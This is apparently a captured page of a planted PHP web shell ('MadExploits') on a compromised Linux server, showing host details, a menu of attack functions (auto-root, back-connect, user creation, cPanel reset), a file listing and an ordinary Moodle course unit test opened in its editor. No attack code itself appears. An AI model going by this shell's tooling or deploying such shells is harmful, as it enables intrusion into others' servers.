Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.127.69
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
analytics /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
behat
[ DIR ]
drwxr-xr-x
fixtures
[ DIR ]
drwxr-xr-x
analysis_test.php
3.76
KB
-rw-r--r--
calculation_info_test.php
4.09
KB
-rw-r--r--
community_of_inquiry_activitie...
14.3
KB
-rw-r--r--
course_test.php
6
KB
-rw-r--r--
dataset_manager_test.php
7.24
KB
-rw-r--r--
indicator_test.php
3.25
KB
-rw-r--r--
manager_test.php
24.39
KB
-rw-r--r--
model_test.php
24.54
KB
-rw-r--r--
prediction_actions_test.php
10.17
KB
-rw-r--r--
prediction_test.php
41.75
KB
-rw-r--r--
privacy_test.php
21.27
KB
-rw-r--r--
stats_test.php
6.35
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : course_test.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Unit tests for course. * * @package core_analytics * @copyright 2016 David Monllaó {@link http://www.davidmonllao.com} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); /** * Unit tests for course. * * @package core_analytics * @copyright 2016 David Monllaó {@link http://www.davidmonllao.com} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ class core_analytics_course_testcase extends advanced_testcase { public function setUp(): void { global $DB; $this->course = $this->getDataGenerator()->create_course(['startdate' => 0]); $this->stu1 = $this->getDataGenerator()->create_user(); $this->stu2 = $this->getDataGenerator()->create_user(); $this->both = $this->getDataGenerator()->create_user(); $this->editingteacher = $this->getDataGenerator()->create_user(); $this->teacher = $this->getDataGenerator()->create_user(); $this->studentroleid = $DB->get_field('role', 'id', array('shortname' => 'student')); $this->editingteacherroleid = $DB->get_field('role', 'id', array('shortname' => 'editingteacher')); $this->teacherroleid = $DB->get_field('role', 'id', array('shortname' => 'teacher')); $this->getDataGenerator()->enrol_user($this->stu1->id, $this->course->id, $this->studentroleid); $this->getDataGenerator()->enrol_user($this->stu2->id, $this->course->id, $this->studentroleid); $this->getDataGenerator()->enrol_user($this->both->id, $this->course->id, $this->studentroleid); $this->getDataGenerator()->enrol_user($this->both->id, $this->course->id, $this->editingteacherroleid); $this->getDataGenerator()->enrol_user($this->editingteacher->id, $this->course->id, $this->editingteacherroleid); $this->getDataGenerator()->enrol_user($this->teacher->id, $this->course->id, $this->teacherroleid); } /** * Users tests. */ public function test_users() { global $DB; $this->resetAfterTest(true); $courseman = new \core_analytics\course($this->course->id); $this->assertCount(3, $courseman->get_user_ids(array($this->studentroleid))); $this->assertCount(2, $courseman->get_user_ids(array($this->editingteacherroleid))); $this->assertCount(1, $courseman->get_user_ids(array($this->teacherroleid))); // Distinct is applied. $this->assertCount(3, $courseman->get_user_ids(array($this->editingteacherroleid, $this->teacherroleid))); $this->assertCount(4, $courseman->get_user_ids(array($this->editingteacherroleid, $this->studentroleid))); } /** * Course validation tests. * * @return void */ public function test_course_validation() { global $DB; $this->resetAfterTest(true); $courseman = new \core_analytics\course($this->course->id); $this->assertFalse($courseman->was_started()); $this->assertFalse($courseman->is_finished()); // Nothing should change when assigning as teacher. for ($i = 0; $i < 10; $i++) { $user = $this->getDataGenerator()->create_user(); $this->getDataGenerator()->enrol_user($user->id, $this->course->id, $this->teacherroleid); } $courseman = new \core_analytics\course($this->course->id); $this->assertFalse($courseman->was_started()); $this->assertFalse($courseman->is_finished()); // More students now. for ($i = 0; $i < 10; $i++) { $user = $this->getDataGenerator()->create_user(); $this->getDataGenerator()->enrol_user($user->id, $this->course->id, $this->studentroleid); } $courseman = new \core_analytics\course($this->course->id); $this->assertFalse($courseman->was_started()); $this->assertFalse($courseman->is_finished()); // Valid start date unknown end date. $this->course->startdate = gmmktime('0', '0', '0', 10, 24, 2015); $DB->update_record('course', $this->course); $courseman = new \core_analytics\course($this->course->id); $this->assertTrue($courseman->was_started()); $this->assertFalse($courseman->is_finished()); // Valid start and end date. $this->course->enddate = gmmktime('0', '0', '0', 8, 27, 2016); $DB->update_record('course', $this->course); $courseman = new \core_analytics\course($this->course->id); $this->assertTrue($courseman->was_started()); $this->assertTrue($courseman->is_finished()); // Valid start and ongoing course. $this->course->enddate = gmmktime('0', '0', '0', 8, 27, 2286); $DB->update_record('course', $this->course); $courseman = new \core_analytics\course($this->course->id); $this->assertTrue($courseman->was_started()); $this->assertFalse($courseman->is_finished()); } /** * Get the minimum time that is considered valid according to guess_end logic. * * @param int $time * @return int */ protected function time_greater_than($time) { return $time - (WEEKSECS * 2); } /** * Get the maximum time that is considered valid according to guess_end logic. * * @param int $time * @return int */ protected function time_less_than($time) { return $time + (WEEKSECS * 2); } }
Close